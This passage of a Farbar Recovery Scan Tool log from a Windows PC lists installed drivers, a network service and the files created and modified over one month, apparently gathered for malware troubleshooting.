R3 RzCommon; C:\WINDOWS\System32\drivers\RzCommon.sys [55128 2021-06-10] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_007a; C:\WINDOWS\System32\drivers\RzDev_007a.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_024e; C:\WINDOWS\System32\drivers\RzDev_024e.sys [54168 2020-08-24] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0520; C:\WINDOWS\System32\drivers\RzDev_0520.sys [54088 2021-03-22] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0f19; C:\WINDOWS\System32\drivers\RzDev_0f19.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 RZSURROUNDVADService; C:\WINDOWS\system32\drivers\RzSurroundVAD.sys [49176 2016-10-16] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 SIVDriver; C:\WINDOWS\system32\Drivers\SIVX64.sys [205552 2021-02-12] (RH Software Ltd -> Ray Hinchliffe)
S3 SjtWinIo20; C:\WINDOWS\System32\drivers\SjtWinIo_v2_0.sys [11776 2021-01-28] (SpeedJet Technology INC.) [File not signed]
S3 sRZTHXSpatial; C:\WINDOWS\System32\drivers\RZTHXSpatial.sys [172024 2020-04-26] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64872 2019-09-26] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated)
R3 sTHXVAD; C:\WINDOWS\System32\drivers\THXVAD.sys [162184 2019-09-17] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 tmhidusb; C:\WINDOWS\system32\DRIVERS\tmhidusb.sys [432136 2021-11-19] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster)
S3 tmT80HidBus; C:\WINDOWS\System32\Drivers\tmT80HidBus.sys [146544 2018-12-03] (WDKTestCert plukidis,131540205154897060 -> © Guillemot R&D, 2018. All rights reserved.)
S3 tmT80hidusb; C:\WINDOWS\System32\drivers\tmt80hidusb.sys [90328 2018-12-03] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster)
S3 tmwbulk; C:\WINDOWS\System32\Drivers\tmwbulk.sys [381984 2021-03-24] (Microsoft Windows Hardware Compatibility Publisher -> © Guillemot R&D, 2021. All rights reserved.)
S3 trufos; C:\WINDOWS\System32\drivers\trufos.sys [611728 2021-02-21] (Bitdefender SRL -> Bitdefender)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1092456 2022-06-16] (Shanghai Yitu Information Technology Co., Ltd. -> e2eSoft)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49616 2022-11-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [469280 2022-11-01] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [95520 2022-11-01] (Microsoft Windows -> Microsoft Corporation)
S3 windtun420; C:\WINDOWS\System32\drivers\windtun420.sys [47544 2021-06-02] (Windscribe Limited -> WireGuard LLC)
S3 WINIO; C:\Program Files (x86)\MSI\Dragon Center\winio64.sys [18688 2018-07-18] (WDKTestCert heavenluo,131620253795976757 -> )
R3 WiseUnlock; C:\WINDOWS\WiseUnlock64.sys [33864 2020-09-26] (Beijing Lang Xingda Network Technology Co., Ltd -> WiseCleaner.com)
S4 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
U0 Partizan; system32\drivers\Partizan.sys [X]
S4 semav6msr64; \??\C:\WINDOWS\system32\drivers\semav6msr64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: DcSvc -> C:\Windows\system32\dcsvc.dll (Microsoft Corporation)

==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-11-07 22:44 - 2022-11-07 22:44 - 000040674 _____ C:\Users\Woytman\Desktop\FRST.txt
2022-11-07 22:44 - 2022-11-07 22:44 - 000000000 ____D C:\FRST
2022-11-07 22:38 - 2022-11-07 22:38 - 002374656 _____ (Farbar) C:\Users\Woytman\Desktop\FRST64.exe
2022-11-07 22:34 - 2022-11-07 22:34 - 000000000 ____D C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni
2022-11-07 21:36 - 2022-11-07 21:36 - 000006766 _____ C:\Users\Woytman\Desktop\pcbs.txt
2022-11-07 21:34 - 2022-11-07 21:34 - 000262794 _____ C:\Users\Woytman\Desktop\PCBS.xlsx
2022-11-07 18:40 - 2022-11-07 19:02 - 000003127 _____ C:\Users\Woytman\Desktop\footer_part.php
2022-11-07 16:40 - 2022-11-07 16:40 - 000003416 _____ C:\WINDOWS\system32\Tasks\CCleanerCrashReporting
2022-11-07 16:40 - 2022-11-07 16:40 - 000000760 _____ C:\WINDOWS\Tasks\CCleanerCrashReporting.job
2022-11-07 16:37 - 2022-11-07 22:44 - 000000000 ____D C:\WINDOWS\system32\MpEngineStore
2022-11-06 21:32 - 2022-11-06 21:32 - 2823296964 _____ C:\Users\Woytman\Desktop\PC Building Simulator.7z
2022-11-06 00:28 - 2022-11-06 00:28 - 000001008 _____ C:\Users\Woytman\Desktop\zkouska-prekladu.txt
2022-11-05 16:23 - 2022-11-07 22:34 - 000002487 _____ C:\Users\Woytman\Desktop\Google Chrome.lnk
2022-11-05 02:37 - 2022-11-05 02:37 - 000000000 ____D C:\WINDOWS\LastGood
2022-11-05 02:13 - 2022-10-26 23:30 - 002236992 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 002236992 _____ C:\WINDOWS\system32\vulkaninfo.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001642600 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001642600 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001444448 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001444448 _____ C:\WINDOWS\system32\vulkan-1.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001168960 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001168960 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2022-11-05 02:13 - 2022-10-26 23:29 - 001487880 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2022-11-05 02:13 - 2022-10-26 23:29 - 001226744 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000865272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000672280 _____ C:\WINDOWS\system32\nvofapi64.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000507440 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 002161640 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001618944 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001530864 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001190912 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 000950272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 000746496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe
2022-11-05 02:13 - 2022-10-26 23:24 - 012451824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 010219016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 005891080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 003334656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 000734720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 000458248 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe
2022-11-05 02:13 - 2022-10-26 23:23 - 005856760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcudadebugger.dll
2022-11-05 02:13 - 2022-10-26 23:23 - 005816312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2022-11-05 02:13 - 2022-10-26 23:23 - 000853016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe
2022-11-05 02:13 - 2022-10-26 23:21 - 007642784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2022-11-05 02:13 - 2022-10-26 23:21 - 006512336 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2022-11-05 02:13 - 2022-10-26 01:15 - 000100589 _____ C:\WINDOWS\system32\nvinfo.pb
2022-11-05 02:09 - 2022-11-05 02:09 - 000004308 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003976 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003940 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003894 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003654 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-07-14 00:32 - 000060112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2022-11-05 02:05 - 2022-11-05 02:05 - 000002299 _____ C:\Users\Woytman\Desktop\DeepL.lnk
2022-11-05 01:28 - 2022-11-05 01:47 - 000000000 ____D C:\Program Files (x86)\SeoTools for Excel
2022-11-04 23:30 - 2022-11-04 23:30 - 000000067 _____ C:\Users\Woytman\Desktop\stavba.txt
2022-11-04 23:08 - 2022-11-04 23:08 - 000012214 _____ C:\Users\Woytman\Documents\zaklady.xlsm
2022-11-03 00:36 - 2022-11-03 00:36 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2022-11-02 21:50 - 2022-11-02 21:50 - 000000000 ____D C:\Users\Woytman\AppData\Local\ManagerV2
2022-11-02 21:40 - 2022-11-02 21:40 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2022-11-02 21:39 - 2022-11-02 21:48 - 000000000 ____D C:\Program Files\Rockstar Games
2022-10-30 22:22 - 2022-11-05 16:30 - 000002258 _____ C:\WINDOWS\system32\Tasks\CCleanerSkipUAC - Woytman
2022-10-24 19:20 - 2022-10-24 19:20 - 000037624 _____ C:\Users\Woytman\Documents\ukázka.veg
2022-10-24 19:16 - 2022-10-24 19:16 - 299622757 _____ C:\Users\Woytman\Documents\Untitled4.mp4
2022-10-23 15:20 - 2022-10-23 15:20 - 000001178 _____ C:\Users\Woytman\Desktop\TS4_x64.exe.lnk
2022-10-22 18:04 - 2022-10-22 18:04 - 000000000 ____D C:\Users\Woytman\AppData\Local\GameAnalytics
2022-10-22 18:03 - 2022-10-22 18:03 - 000001711 _____ C:\Users\Public\Desktop\LEGO® Bricktales.lnk
2022-10-22 18:03 - 2022-10-22 18:03 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\ClockStone Software GmbH
2022-10-22 18:03 - 2022-10-22 18:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO® Bricktales [GOG.com]
2022-10-22 18:01 - 2022-10-12 16:31 - 000000000 ____D C:\Users\Woytman\Desktop\LEGO.Bricktales-GOG
2022-10-22 08:21 - 2022-10-22 08:21 - 000011262 _____ C:\Users\Woytman\Documents\Hesla Chrome.csv
2022-10-19 16:56 - 2022-10-19 16:56 - 000002946 _____ C:\Users\Woytman\Documents\Module3.bas
2022-10-19 16:56 - 2022-10-19 16:56 - 000000263 _____ C:\Users\Woytman\Documents\Module2.bas
2022-10-19 16:56 - 2022-10-19 16:56 - 000000232 _____ C:\Users\Woytman\Documents\Module1.bas
2022-10-17 22:39 - 2022-10-17 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Building Simulator [GOG.com]
2022-10-17 22:32 - 2022-10-17 22:32 - 000001224 _____ C:\Users\Public\Desktop\GOG GALAXY.lnk
2022-10-17 22:31 - 2022-10-17 22:32 - 000000000 ____D C:\Program Files (x86)\GOG Galaxy
2022-10-17 21:06 - 2022-11-07 18:40 - 000000000 ____D C:\Users\Woytman\Desktop\FBI - Secret Files
2022-10-16 10:26 - 2022-11-03 00:38 - 000003704 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA{0F4697CB-846A-446D-9512-E26D98D15268}
2022-10-16 10:26 - 2022-11-03 00:38 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore{034ABE64-6EBF-4C3C-8A70-5786FAF890B2}
2022-10-15 22:33 - 2022-10-15 22:34 - 000000000 ____D C:\Users\Woytman\AppData\Local\unali-40699656
2022-10-15 22:33 - 2022-10-15 22:34 - 000000000 ____D C:\Users\Woytman\AppData\Local\unali-40699531
2022-10-15 22:09 - 2022-10-15 22:09 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2022-10-15 22:01 - 2022-10-15 22:01 - 000000198 _____ C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
2022-10-15 21:55 - 2022-10-15 22:23 - 000000000 ____D C:\Users\Public\Documents\RegRunInfo
2022-10-15 21:02 - 2022-10-15 21:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2022-10-15 21:02 - 2022-10-15 21:02 - 000000000 ____D C:\Program Files\CPUID
2022-10-15 20:05 - 2022-10-22 18:02 - 000000000 ____D C:\Games
2022-10-15 18:08 - 2022-10-15 18:08 - 000000000 ____D C:\Users\Woytman\AppData\Local\GOG.com
2022-10-15 02:03 - 2022-10-15 02:03 - 000032552 _____ C:\Users\Woytman\Documents\Untitled.veg
2022-10-15 01:51 - 2022-10-15 01:51 - 272056361 _____ C:\Users\Woytman\Documents\Untitled.mp4
2022-10-15 00:57 - 2022-10-15 00:57 - 000011200 _____ C:\Users\Woytman\Documents\Clean Logo Reveal Intro Template.mp4.sfk
2022-10-15 00:56 - 2022-10-15 00:56 - 008206657 _____ C:\Users\Woytman\Documents\Clean Logo Reveal Intro Template.mp4
2022-10-15 00:52 - 2022-10-15 00:52 - 000021600 _____ C:\Users\Woytman\Documents\Untitled.veg.bak
2022-10-15 00:33 - 2022-10-15 00:33 - 000000000 ____D C:\Users\Woytman\AppData\Local\MAGIX
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\VEGAS Pro
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\MAGIX
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Local\Plugin.ofx360Stabilizer
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\ProgramData\VEGAS Pro
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\ProgramData\Magix
2022-10-15 00:10 - 2022-10-24 18:34 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\obs-studio
2022-10-12 18:49 - 2022-10-12 18:49 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\Epic Games Publishing
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Locktime
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetLimiter 4
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\ProgramData\Locktime
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\Program Files\Locktime Software
2022-10-11 19:48 - 2022-10-12 18:12 - 000000000 ____D C:\Program Files\Epic Games
2022-10-11 19:42 - 2022-10-16 21:08 - 000000000 ____D C:\Users\Woytman\AppData\Local\EpicGamesLauncher
2022-10-11 19:42 - 2022-10-12 18:37 - 000000000 ____D C:\Users\Woytman\AppData\Local\Epic Games
2022-10-11 19:42 - 2022-10-11 19:42 - 000000000 ____D C:\Users\Woytman\AppData\Local\UnrealEngineLauncher
2022-10-11 19:41 - 2022-10-11 19:44 - 000000000 ____D C:\ProgramData\Epic
2022-10-11 19:41 - 2022-10-11 19:41 - 000001334 _____ C:\Users\Woytman\Desktop\Epic Games Launcher.lnk
2022-10-11 19:41 - 2022-10-11 19:41 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-10-11 19:41 - 2022-10-11 19:41 - 000000000 ____D C:\Program Files (x86)\Epic Games
2022-10-11 18:57 - 2022-10-11 18:57 - 000015501 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-10-11 18:56 - 2022-10-11 18:56 - 000077824 _____ C:\WINDOWS\system32\runexehelper.exe
2022-10-11 18:53 - 2022-10-11 18:53 - 000000000 ___HD C:\$WinREAgent
2022-10-10 23:30 - 2022-10-10 23:30 - 000000188 _____ C:\Users\Woytman\Documents\nový 2.txt
2022-10-08 16:01 - 2022-10-08 16:01 - 000000000 ____D C:\Users\Woytman\Documents\Electronic Arts
2022-10-08 16:00 - 2022-10-08 16:00 - 000000000 ____D C:\Users\Woytman\AppData\Local\anadius

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-11-07 22:44 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SystemTemp
2022-11-07 22:43 - 2022-04-03 23:32 - 000000000 ____D C:\ProgramData\Adguard
2022-11-07 22:34 - 2021-10-23 22:58 - 000000000 ____D C:\Users\Woytman
2022-11-07 22:34 - 2020-09-26 22:25 - 000002452 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-11-07 21:54 - 2022-04-28 08:22 - 000000000 ____D C:\Users\Woytman\AppData\Local\CrashDumps
2022-11-07 21:42 - 2020-09-26 22:20 - 000000000 ____D C:\Users\Woytman\AppData\Local\Packages
2022-11-07 20:34 - 2021-06-05 13:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-11-07 20:11 - 2021-10-23 22:57 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-11-07 19:20 - 2022-01-11 21:46 - 000000128 _____ C:\Users\Woytman\AppData\Roaming\winscp.rnd
2022-11-07 18:34 - 2022-07-01 21:13 - 000000132 _____ C:\Users\Woytman\AppData\Roaming\Adobe PNG Format CS6 Prefs
2022-11-07 18:20 - 2020-12-28 23:03 - 000000000 ____D C:\Users\Woytman\AppData\Local\Google
2022-11-07 16:40 - 2022-01-12 22:29 - 000000000 ____D C:\ProgramData\NVIDIA
2022-11-07 16:40 - 2020-09-27 08:30 - 000000000 ____D C:\Program Files\CCleaner
2022-11-06 19:32 - 2021-10-23 23:11 - 001714894 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-11-06 19:32 - 2021-06-05 18:20 - 000714186 _____ C:\WINDOWS\system32\perfh005.dat
2022-11-06 19:32 - 2021-06-05 18:20 - 000146956 _____ C:\WINDOWS\system32\perfc005.dat
2022-11-06 19:32 - 2021-06-05 13:09 - 000000000 ____D C:\WINDOWS\INF
2022-11-06 19:27 - 2022-04-28 15:59 - 000000000 ____D C:\Intel
2022-11-06 19:27 - 2021-10-23 23:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-11-06 19:27 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\ServiceState
2022-11-06 19:27 - 2020-06-12 23:13 - 000012288 ___SH C:\DumpStack.log.tmp
2022-11-06 19:27 - 2019-11-20 18:19 - 000000000 __SHD C:\Users\Woytman\IntelGraphicsProfiles
2022-11-06 17:17 - 2021-06-05 13:01 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2022-11-05 18:33 - 2021-06-05 13:01 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-11-05 16:41 - 2021-06-05 13:10 - 000000000 ___HD C:\Program Files\WindowsApps
2022-11-05 16:41 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-11-05 16:36 - 2022-07-28 23:23 - 000002715 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-11-05 16:32 - 2020-09-26 22:25 - 000000000 ____D C:\Program Files (x86)\Google
2022-11-05 16:29 - 2021-12-29 23:10 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2022-11-05 02:38 - 2022-01-12 22:31 - 000000000 ____D C:\Users\Woytman\AppData\Local\NVIDIA
2022-11-05 02:11 - 2022-08-19 13:38 - 000003830 _____ C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DeepL.lnk
2022-11-05 02:09 - 2022-01-12 22:30 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2022-11-05 02:09 - 2022-01-12 22:29 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2022-11-05 02:09 - 2022-01-12 22:25 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2022-11-05 02:07 - 2020-09-26 22:20 - 000000000 ____D C:\ProgramData\Packages
2022-11-05 00:39 - 2022-08-22 22:46 - 000000000 ____D C:\Users\Woytman\AppData\Local\DeepL_SE
2022-11-03 02:37 - 2022-06-12 22:04 - 000000000 ____D C:\Program Files\Microsoft Office
2022-11-03 02:36 - 2021-12-25 11:56 - 000000000 ____D C:\Users\Woytman\AppData\Local\ElevatedDiagnostics
2022-11-03 01:31 - 2022-08-22 22:52 - 000000000 ____D C:\Users\Woytman\Downloads\dnSpy-net-win64
2022-11-03 00:38 - 2022-03-21 00:19 - 000003538 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
2022-11-03 00:37 - 2022-08-21 20:16 - 000000000 ____D C:\temp
2022-11-02 22:00 - 2022-06-10 17:03 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\qBittorrent
2022-11-02 21:50 - 2022-08-19 20:56 - 000000000 ____D C:\Users\Woytman\Downloads\CZ_Manager_2.3.3.9
2022-11-02 21:40 - 2020-09-26 22:31 - 000000000 ____D C:\ProgramData\Rockstar Games
2022-11-02 21:39 - 2021-12-01 16:59 - 000000000 ____D C:\Users\Woytman\AppData\Local\Rockstar Games
2022-11-02 21:39 - 2021-01-16 09:01 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rockstar Games
2022-11-01 06:01 - 2020-09-26 22:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-10-30 22:22 - 2022-01-30 03:32 - 000000000 ____D C:\Program Files (x86)\Steam
2022-10-30 20:34 - 2022-08-21 20:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
2022-10-30 20:33 - 2022-08-21 20:14 - 000000000 ____D C:\Program Files (x86)\Razer Chroma SDK
2022-10-27 18:56 - 2022-05-29 09:05 - 000000000 ____D C:\Users\Woytman\AppData\Local\D3DSCache
2022-10-24 19:20 - 2020-10-05 21:12 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\vlc
2022-10-24 18:38 - 2022-08-21 20:16 - 000000000 ____D C:\Users\Woytman\AppData\Local\Razer
2022-10-24 18:38 - 2022-08-21 20:11 - 000000000 ____D C:\Program Files (x86)\Razer
2022-10-22 16:19 - 2020-11-21 11:20 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-10-19 19:47 - 2020-09-26 22:32 - 000000884 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2022-10-19 19:47 - 2020-09-26 22:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Notepad++
2022-10-18 15:54 - 2021-10-23 22:57 - 002545728 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-10-17 22:32 - 2021-10-28 17:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2022-10-17 22:31 - 2021-10-28 17:19 - 000000000 ____D C:\ProgramData\GOG.com
2022-10-17 07:25 - 2022-06-10 22:44 - 002890296 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2022-10-17 07:25 - 2022-06-10 22:44 - 002224696 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2022-10-17 07:25 - 2022-06-10 22:44 - 001297464 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2022-10-16 19:33 - 2022-06-03 22:09 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\The Irregular Corp
2022-10-15 22:36 - 2022-08-25 22:13 - 000000000 ____D C:\Program Files (x86)\EaseUS
2022-10-15 22:34 - 2022-01-30 03:49 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-10-15 22:34 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\registration
2022-10-15 00:32 - 2021-09-06 23:06 - 000000000 ____D C:\ProgramData\VEGAS
2022-10-15 00:32 - 2021-05-24 11:58 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\VEGAS
2022-10-15 00:10 - 2021-05-24 11:34 - 000000000 ____D C:\ProgramData\obs-studio-hook
2022-10-15 00:10 - 2021-05-24 11:34 - 000000000 ____D C:\Program Files\obs-studio
2022-10-15 00:10 - 2021-01-25 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2022-10-12 16:08 - 2021-03-10 06:32 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-10-12 16:06 - 2020-10-02 18:54 - 147398024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-10-12 16:05 - 2022-07-30 19:40 - 000000000 ____D C:\Program Files\dotnet
2022-10-12 16:05 - 2021-02-19 12:35 - 000000000 ____D C:\ProgramData\Package Cache
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SystemResources
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-10-11 18:56 - 2021-10-23 22:57 - 003106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-10-11 18:46 - 2021-10-23 23:42 - 000000000 ____D C:\Program Files\MSBuild
2022-10-11 18:46 - 2021-10-23 23:42 - 000000000 ____D C:\Program Files (x86)\MSBuild

==================== Files in the root of some directories ========

2021-12-13 16:12 - 2021-12-13 16:12 - 000000257 _____ () C:\ProgramData\fontcacheev1.dat
2022-07-01 21:13 - 2022-11-07 18:34 - 000000132 _____ () C:\Users\Woytman\AppData\Roaming\Adobe PNG Format CS6 Prefs
